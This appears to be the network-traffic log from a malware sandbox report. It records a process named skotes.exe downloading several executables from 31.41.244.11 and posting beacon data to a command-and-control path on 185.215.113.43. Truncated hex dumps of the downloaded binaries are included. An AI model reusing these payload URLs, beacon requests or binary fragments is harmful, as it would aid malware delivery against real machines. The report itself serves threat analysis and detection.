                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        4192.168.2.104987231.41.244.11807820C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:16.415262938 CET66OUTGET /files/7427009775/AzVRM7c.exe HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 31.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.714489937 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:48:17 GMT
                                                                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                        Content-Length: 605696
                                                                                                                                                                                                                                                                                        Last-Modified: Thu, 12 Dec 2024 15:01:25 GMT
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        ETag: "675afac5-93e00"
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4d 93 ba 99 09 f2 d4 ca 09 f2 d4 ca 09 f2 d4 ca 42 8a d7 cb 0c f2 d4 ca 42 8a d1 cb b6 f2 d4 ca 19 76 d7 cb 03 f2 d4 ca 19 76 d0 cb 18 f2 d4 ca 42 8a d2 cb 08 f2 d4 ca 19 76 d1 cb 63 f2 d4 ca 52 9a d5 cb 0b f2 d4 ca 42 8a d0 cb 12 f2 d4 ca 42 8a d5 cb 18 f2 d4 ca 09 f2 d5 ca cf f2 d4 ca 42 77 dd cb 0c f2 d4 ca 42 77 2b ca 08 f2 d4 ca 09 f2 43 ca 08 f2 d4 ca 42 77 d6 cb 08 f2 d4 ca 52 69 63 68 09 f2 d4 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 31 b5 31 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 29 00 ee 06 00 00 6c 02 00 00 00 00 00 0c 32 04 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 [TRUNCATED]
                                                                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MBBvvBvcRBBBwBw+CBwRichPEd11g")l2@``HtLpp(@@.text> `.rdatad@@.data;@.pdatatLN@@.rsrcH`,@@.relocp2@B
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.714499950 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 55 48 8d ac 24 50 fe ff ff 48 81 ec b0 02 00 00 0f 57 c0 0f 11 44 24 30 0f 57
                                                                                                                                                                                                                                                                                        Data Ascii: @UH$PHWD$0WfL$@A H)HL$0g4WD$PWfL$`AHHL$P>4WD$pWfMA HHL$p4WEWfMAHHM3WEWf
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.714508057 CET448INData Raw: 48 8d 4d b0 e8 fa 2f 02 00 90 0f 57 c0 0f 11 45 d0 0f 57 c9 66 0f 7f 4d e0 41 b8 21 00 00 00 48 8d 15 dd a9 07 00 48 8d 4d d0 e8 d4 2f 02 00 90 0f 57 c0 0f 11 45 f0 0f 57 c9 66 0f 7f 4d 00 41 b8 20 00 00 00 48 8d 15 07 a8 07 00 48 8d 4d f0 e8 ae
                                                                                                                                                                                                                                                                                        Data Ascii: HM/WEWfMA!HHM/WEWfMA HHM/WEWfM A!HHM/WE0WfM@A HHM0b/WEPWfM`A!HHMP</WEpWfA HHMp/W
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.714623928 CET1236INData Raw: 00 00 41 b8 21 00 00 00 48 8d 15 fc a8 07 00 48 8d 8d 10 01 00 00 e8 28 2e 02 00 90 0f 57 c0 0f 11 85 30 01 00 00 0f 57 c9 66 0f 7f 8d 40 01 00 00 41 b8 20 00 00 00 48 8d 15 55 a7 07 00 48 8d 8d 30 01 00 00 e8 f9 2d 02 00 90 0f 57 c0 0f 11 85 50
                                                                                                                                                                                                                                                                                        Data Ascii: A!HH(.W0Wf@A HUH0-WPWf`A!HHP-WpWfA H/Hp-WWfA!HHl-HD$0HD$ HHD$((D$
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.714706898 CET1236INData Raw: 00 00 00 48 8d 15 65 a5 07 00 48 8d 4d e0 e8 5c 29 02 00 90 0f 57 c0 0f 11 45 00 0f 57 c9 66 0f 7f 4d 10 41 b8 6a 00 00 00 48 8d 15 df a6 07 00 48 8d 4d 00 e8 36 29 02 00 90 0f 57 c0 0f 11 45 20 0f 57 c9 66 0f 7f 4d 30 41 b8 08 00 00 00 48 8d 15
                                                                                                                                                                                                                                                                                        Data Ascii: HeHM\)WEWfMAjHHM6)WE WfM0AHIHM )WE@WfMPAoHHM@(3HHP]HH@HHWfHH?LH
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.714719057 CET1236INData Raw: 83 c4 28 e9 5f 0d 04 00 cc cc cc 48 83 ec 28 41 b9 01 00 00 00 48 8d 15 ff cf 08 00 45 33 c0 48 8d 0d 85 cf 08 00 e8 a0 e2 01 00 48 8d 0d c5 da 06 00 48 83 c4 28 e9 2c 0d 04 00 40 53 48 83 ec 20 b9 02 00 00 00 e8 b8 77 04 00 48 8d 0d c9 cf 08 00
                                                                                                                                                                                                                                                                                        Data Ascii: (_H(AHE3HHH(,@SH wHH!HE3HHHAHH [HHHHcHHHDPHHcHLH(HH}H(HQHJH
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.714731932 CET1236INData Raw: 20 5b c3 cc cc cc cc 44 89 02 48 8b c2 48 89 4a 08 c3 cc cc cc cc cc 40 53 48 83 ec 30 48 8b 01 49 8b d8 44 8b c2 48 8d 54 24 20 ff 50 18 48 8b 4b 08 4c 8b 48 08 48 8b 51 08 49 39 51 08 75 0e 8b 0b 39 08 75 08 b0 01 48 83 c4 30 5b c3 32 c0 48 83
                                                                                                                                                                                                                                                                                        Data Ascii: [DHHJ@SH0HIDHT$ PHKLHHQI9Qu9uH0[2H0[HBLHL9IuD9u2HyHAHH9HAH@SVWH)$HHHL$ IHL$h%HHD$ 6Hxt
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.714812994 CET1236INData Raw: 8b da 41 83 f8 01 75 1d 0f 57 c0 41 b8 15 00 00 00 0f 11 02 48 89 7a 10 48 89 7a 18 48 8d 15 b8 bb 07 00 eb 2a 41 8b c8 e8 f6 e1 03 00 0f 57 c0 49 c7 c0 ff ff ff ff 0f 11 03 48 89 7b 10 48 89 7b 18 90 49 ff c0 42 38 3c 00 75 f7 48 8b d0 48 8b cb
                                                                                                                                                                                                                                                                                        Data Ascii: AuWAHzHzH*AWIH{H{IB8<uHHHH\$@H0_HH\$WH@HH3HD$8HHT$(3H|$(HT$(A7HD$0WHH{H{HuAH3LHT$(HL
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.714824915 CET1236INData Raw: 7b 8c 07 00 33 d2 48 8d 4d b7 e8 54 bc 03 00 90 4c 89 75 bf c6 45 c7 00 4c 89 75 cf c6 45 d7 00 4c 89 75 df 66 44 89 75 e7 4c 89 75 ef 66 44 89 75 f7 4c 89 75 ff c6 45 07 00 4c 89 75 0f c6 45 17 00 48 85 db 0f 84 d2 00 00 00 48 8b d3 48 8d 4d b7
                                                                                                                                                                                                                                                                                        Data Ascii: {3HMTLuELuELufDuLufDuLuELuEHHHMdDvHHHMlHFN H7HMHMHtLuHMHtLuHMHtLuHMHtLuHMHtLuHMHtL
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.714835882 CET1236INData Raw: 48 8b f1 4d 3b c1 74 20 0f 1f 00 48 8b 06 0f b7 d5 44 0f b7 03 48 8b ce ff 50 20 84 c0 75 09 48 83 c3 02 48 3b df 75 e3 48 8b c3 48 8b 5c 24 58 48 83 c4 20 5f 5e 5d c3 cc cc cc 48 89 5c 24 20 55 56 57 48 83 ec 20 49 8b f9 49 8b d8 0f b7 ea 48 8b
                                                                                                                                                                                                                                                                                        Data Ascii: HM;t HDHP uHH;uHH\$XH _^]H\$ UVWH IIHM;t HDHP tHH;uHH\$XH _^]HQH\$ VH IHI;t'H|$@HyfHfHH;uH|$@HH\$HH ^HQ
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.834417105 CET1236INData Raw: 68 c3 33 d2 33 c9 e8 8c 11 04 00 cc 48 89 5c 24 60 f6 c2 04 74 09 48 8d 1d c2 82 07 00 eb 15 f6 c2 02 48 8d 1d ce 82 07 00 48 8d 05 df 82 07 00 48 0f 44 d8 ba 01 00 00 00 48 8d 4c 24 20 e8 04 ed ff ff 4c 8b c0 48 8d 4c 24 30 48 8b d3 e8 d4 fe ff
                                                                                                                                                                                                                                                                                        Data Ascii: h33H\$`tHHHHDHL$ LHL$0HHeHL$03H\$`H\$WH H3HA@HAAAHA HA(HA0HA8AVHWHCH_@H\$0H _H\$WH H


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        5192.168.2.1049884185.215.113.43807820C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:21.459445953 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                                                                        Content-Length: 31
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 64 31 3d 31 30 31 34 34 33 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                                                        Data Ascii: d1=1014431001&unit=246122658369
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:22.811506987 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:48:22 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        6192.168.2.104989031.41.244.11807820C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:22.948869944 CET66OUTGET /files/7427009775/t5abhIx.exe HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 31.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.265642881 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:48:24 GMT
                                                                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                        Content-Length: 605696
                                                                                                                                                                                                                                                                                        Last-Modified: Thu, 12 Dec 2024 15:01:40 GMT
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        ETag: "675afad4-93e00"
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4d 93 ba 99 09 f2 d4 ca 09 f2 d4 ca 09 f2 d4 ca 42 8a d7 cb 0c f2 d4 ca 42 8a d1 cb b6 f2 d4 ca 19 76 d7 cb 03 f2 d4 ca 19 76 d0 cb 18 f2 d4 ca 42 8a d2 cb 08 f2 d4 ca 19 76 d1 cb 63 f2 d4 ca 52 9a d5 cb 0b f2 d4 ca 42 8a d0 cb 12 f2 d4 ca 42 8a d5 cb 18 f2 d4 ca 09 f2 d5 ca cf f2 d4 ca 42 77 dd cb 0c f2 d4 ca 42 77 2b ca 08 f2 d4 ca 09 f2 43 ca 08 f2 d4 ca 42 77 d6 cb 08 f2 d4 ca 52 69 63 68 09 f2 d4 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 31 b5 31 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 29 00 ee 06 00 00 6c 02 00 00 00 00 00 0c 32 04 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 [TRUNCATED]
                                                                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MBBvvBvcRBBBwBw+CBwRichPEd11g")l2@``HtLpp(@@.text> `.rdatad@@.data;@.pdatatLN@@.rsrcH`,@@.relocp2@B
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.265769958 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 55 48 8d ac 24 50 fe ff ff 48 81 ec b0 02 00 00 0f 57 c0 0f 11 44 24 30 0f 57
                                                                                                                                                                                                                                                                                        Data Ascii: @UH$PHWD$0WfL$@A H)HL$0g4WD$PWfL$`AHHL$P>4WD$pWfMA HHL$p4WEWfMAHHM3WEWf
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.265783072 CET1236INData Raw: 48 8d 4d b0 e8 fa 2f 02 00 90 0f 57 c0 0f 11 45 d0 0f 57 c9 66 0f 7f 4d e0 41 b8 21 00 00 00 48 8d 15 dd a9 07 00 48 8d 4d d0 e8 d4 2f 02 00 90 0f 57 c0 0f 11 45 f0 0f 57 c9 66 0f 7f 4d 00 41 b8 20 00 00 00 48 8d 15 07 a8 07 00 48 8d 4d f0 e8 ae
                                                                                                                                                                                                                                                                                        Data Ascii: HM/WEWfMA!HHM/WEWfMA HHM/WEWfM A!HHM/WE0WfM@A HHM0b/WEPWfM`A!HHMP</WEpWfA HHMp/W
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.265795946 CET1236INData Raw: 57 c0 66 0f 7f 05 c5 f1 08 00 48 c7 05 ca f1 08 00 07 00 00 00 48 c7 05 c7 f1 08 00 08 00 00 00 c7 05 85 f1 08 00 00 00 80 3f 4c 8b c0 ba 10 00 00 00 48 8d 0d 8e f1 08 00 e8 81 f4 01 00 90 48 8d 5c 24 20 66 66 66 0f 1f 84 00 00 00 00 00 4c 8b c3
                                                                                                                                                                                                                                                                                        Data Ascii: WfHH?LHH\$ fffLHU`HRiH@HE`H;uLA@AHL$ xH]H$Hp]TH\$UHl$HpWD$ WfL$0AHHL$ F*WD$@
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.265870094 CET896INData Raw: 0f 04 00 48 83 ec 28 41 b9 01 00 00 00 48 8d 15 17 cf 08 00 45 33 c0 48 8d 0d 9d ce 08 00 e8 68 e4 01 00 48 8d 0d 19 db 06 00 48 83 c4 28 e9 f4 0e 04 00 40 53 48 83 ec 20 b9 01 00 00 00 e8 80 79 04 00 48 8d 0d e1 ce 08 00 48 8b d8 e8 e9 f1 01 00
                                                                                                                                                                                                                                                                                        Data Ascii: H(AHE3HhHH(@SH yHHHJE3HHHHH [HL*LHtHHcHLDPLHHtHHcHLDPH(HHH(<H
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.265882969 CET1236INData Raw: 06 00 e9 a0 0b 04 00 48 83 ec 28 48 8d 0d 69 d5 08 00 e8 6c 01 04 00 48 8d 0d 3d da 06 00 48 83 c4 28 e9 80 0b 04 00 cc cc cc cc 48 8d 0d 39 da 06 00 e9 70 0b 04 00 cc cc cc cc 48 8d 05 81 e8 08 00 c3 cc cc cc cc cc cc cc cc 4c 89 44 24 18 4c 89
                                                                                                                                                                                                                                                                                        Data Ascii: H(HilH=H(H9pHLD$LL$ SUVWH8IHl$xHHHl$(LLHD$ HHHHH8_^][@SH HHHWHSHHH$HH [HyH
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.265916109 CET1236INData Raw: cf e8 91 fd ff ff 48 8b 54 24 60 48 83 fa 0f 76 2e 48 ff c2 48 8b 4c 24 48 48 8b c1 48 81 fa 00 10 00 00 72 15 48 83 c2 27 48 8b 49 f8 48 2b c1 48 83 c0 f8 48 83 f8 1f 77 29 e8 b8 00 04 00 48 8d 05 b1 e2 06 00 48 89 07 0f 11 77 18 48 8b c7 0f 28
                                                                                                                                                                                                                                                                                        Data Ascii: HT$`Hv.HHL$HHHrH'HIH+HHw)HHwH($H_^[/)H\$WH HHHH t(HLH\$0HH _H\$WHPDHHL$ HHJHT$(HPHT$(
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.265928030 CET1236INData Raw: 48 8b c1 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 83 ec 78 8b d1 48 8d 4c 24 30 e8 d0 ff ff ff 48 8d 54 24 20 48 8d 4c 24 40 0f 10 00 0f 29 44 24 20 e8 b9 fb ff ff 48 8d 15 2a 8f 08 00 48 8d 4c 24 40 e8 08 1e 04 00 cc cc cc cc cc cc cc
                                                                                                                                                                                                                                                                                        Data Ascii: HHxHL$0HT$ HL$@)D$ H*HL$@HHAHAHHHHHHL$ HHL$ @SH HHHWHSHHHCHHHHH [3
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.265940905 CET1236INData Raw: b6 0b 48 8b d7 e8 45 e5 03 00 88 03 48 ff c3 48 3b de 75 eb 48 8b 7c 24 40 48 8b c3 48 8b 5c 24 48 48 83 c4 20 5e c3 cc cc cc cc cc cc cc cc 0f b6 c2 c3 cc cc cc cc cc cc cc cc cc cc cc cc 40 53 48 83 ec 20 49 8b d8 49 8b c9 4c 2b c2 e8 1c 62 06
                                                                                                                                                                                                                                                                                        Data Ascii: HEHH;uH|$@HH\$HH ^@SH IIL+bHH [@SH HL$PIL+aHH [H\$WH HHHA ~HIyHIHK(HH@t0HtHH\$0H _H\$
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.266021967 CET896INData Raw: 83 ec 60 48 8b 05 21 9c 08 00 48 33 c4 48 89 44 24 48 49 8b f9 49 8b f0 48 8b da 49 3b d0 0f 84 80 00 00 00 48 89 ac 24 90 00 00 00 48 8d 69 30 4c 89 74 24 58 45 33 f6 4c 89 7c 24 50 41 bf ff ff 00 00 0f 1f 84 00 00 00 00 00 0f b6 03 4c 8d 4c 24
                                                                                                                                                                                                                                                                                        Data Ascii: `H!H3HD$HIIHI;H$Hi0Lt$XE3L|$PALL$@AD$0HT$0Lt$@HL$8Hl$ uL$8HfAHHfOH;uL|$PLt$XH$HHL$HH3H`_^[@SH@HSH3HD$0ALI0LD$ HD$
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:24.386464119 CET1236INData Raw: cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 57 48 83 ec 20 48 8b f9 33 c0 48 89 41 40 48 89 41 08 89 41 14 c7 41 18 01 02 00 00 48 c7 41 20 06 00 00 00 48 89 41 28 48 89 41 30 48 89 41 38 89 41 10 b9 10 00 00 00 e8 56 f1 03 00 48 8b d8 0f 57
                                                                                                                                                                                                                                                                                        Data Ascii: H\$WH H3HA@HAAAHA HA(HA0HA8AVHWHCH_@H\$0H _H\$WH HHHHQHWHK?HLHHCH\$0HHGH _H\$WH HHH


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        7192.168.2.1049904185.215.113.43807820C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:27.928045034 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                                                                        Content-Length: 31
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 64 31 3d 31 30 31 34 34 33 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                                                        Data Ascii: d1=1014432001&unit=246122658369
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.278799057 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:48:29 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        8192.168.2.104991231.41.244.11807820C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.400707960 CET66OUTGET /files/8199790517/u1w30Wt.exe HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 31.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.727490902 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:48:30 GMT
                                                                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                        Content-Length: 308224
                                                                                                                                                                                                                                                                                        Last-Modified: Thu, 12 Dec 2024 15:27:42 GMT
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        ETag: "675b00ee-4b400"
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 61 5c b7 69 25 3d d9 3a 25 3d d9 3a 25 3d d9 3a 2c 45 4a 3a 26 3d d9 3a 25 3d d8 3a 26 3d d9 3a 4a 4b 72 3a 2d 3d d9 3a 4a 4b 43 3a 24 3d d9 3a 4a 4b 44 3a 24 3d d9 3a 52 69 63 68 25 3d d9 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 60 50 59 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0a 00 00 3a 00 00 00 2a 00 00 00 00 00 00 5c 34 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 00 05 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$a\i%=:%=:%=:,EJ:&=:%=:&=:JKr:-=:JKC:$=:JKD:$=:Rich%=:PEd`PYg":*\4@@@h((@P .text9: `.rdataP>@@.datap@.pdata@X@@.rsrc(\@@.x64`T`
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.727545977 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 89 54 24 10 48 89 4c 24 08 48 83 ec 38 48 8b 4c 24 40 ff 15 e7 3f 00 00 48 89
                                                                                                                                                                                                                                                                                        Data Ascii: HT$HL$H8HL$@?HD$(HT$HHL$(?HD$ HD$ H8HT$HL$H8HL$@7`HD$(HT$HHL$(*`HD$ HD$ H8HHHu?HD$0Hq?HD$
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.727561951 CET448INData Raw: 15 96 41 00 00 48 8d 0d a7 41 00 00 e8 a2 fb ff ff 48 89 05 83 5e 00 00 48 8d 15 a4 41 00 00 48 8d 0d ad 41 00 00 e8 88 fb ff ff 48 89 05 71 5e 00 00 48 8d 15 aa 41 00 00 48 8d 0d b3 41 00 00 e8 6e fb ff ff 48 89 05 5f 5e 00 00 48 8d 15 b0 41 00
                                                                                                                                                                                                                                                                                        Data Ascii: AHAH^HAHAHq^HAHAnH_^HAHATHM^HAHA:H;^HAHA H)^HAHAH^HAHAH^HAHAH]HAH
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.727699041 CET1236INData Raw: 8d 0d 4d 42 00 00 e8 e8 f9 ff ff 48 89 05 59 5d 00 00 48 8d 15 4a 42 00 00 48 8d 0d 53 42 00 00 e8 ce f9 ff ff 48 89 05 47 5d 00 00 48 8d 15 50 42 00 00 48 8d 0d 61 42 00 00 e8 b4 f9 ff ff 48 89 05 3d 5c 00 00 48 8d 15 5e 42 00 00 48 8d 0d 6f 42
                                                                                                                                                                                                                                                                                        Data Ascii: MBHY]HJBHSBHG]HPBHaBH=\H^BHoBH+\HlBHuBH[HrBH{BfHYHxBHBLH[HBHB2H[HBHBH[HBHB
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.727713108 CET1236INData Raw: c3 56 00 00 48 8d 15 04 44 00 00 48 8d 0d 15 44 00 00 e8 b8 f4 ff ff 48 89 05 b1 56 00 00 48 8d 15 12 44 00 00 48 8d 0d 13 44 00 00 e8 ee f4 ff ff 48 89 05 d7 55 00 00 48 8d 15 10 44 00 00 48 8d 0d 21 44 00 00 e8 d4 f4 ff ff 48 89 05 85 56 00 00
                                                                                                                                                                                                                                                                                        Data Ascii: VHDHDHVHDHDHUHDH!DHVHDH'DHsVH$DH-DHaVH*DH;DHOVH8DHIDlH=VHFDHWDRH+VHTDH]DHWHZD
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.727725983 CET1236INData Raw: cc cc cc 44 88 44 24 18 89 54 24 10 48 89 4c 24 08 48 83 ec 28 44 8b 44 24 38 48 8b 54 24 30 48 8d 0d b5 42 00 00 ff 15 cf 52 00 00 b0 01 48 83 c4 28 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 89 4c 24 08 57 48 81 ec a0 0a 00 00 c7 84 24
                                                                                                                                                                                                                                                                                        Data Ascii: DD$T$HL$H(DD$8HT$0HBRH(L$WH$H$H3`H$ H$(H33f$@AH$@3mQ$X$Xu3f$@H$BH3$$
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.727741003 CET1236INData Raw: 50 0a 00 00 ff c0 89 84 24 50 0a 00 00 48 8b 84 24 f0 00 00 00 0f b7 40 06 39 84 24 50 0a 00 00 0f 8d a8 00 00 00 48 8b 44 24 70 48 63 40 3c 48 8b 4c 24 60 48 03 c8 48 8b c1 48 63 8c 24 50 0a 00 00 48 6b c9 28 48 8d 84 08 08 01 00 00 48 89 84 24
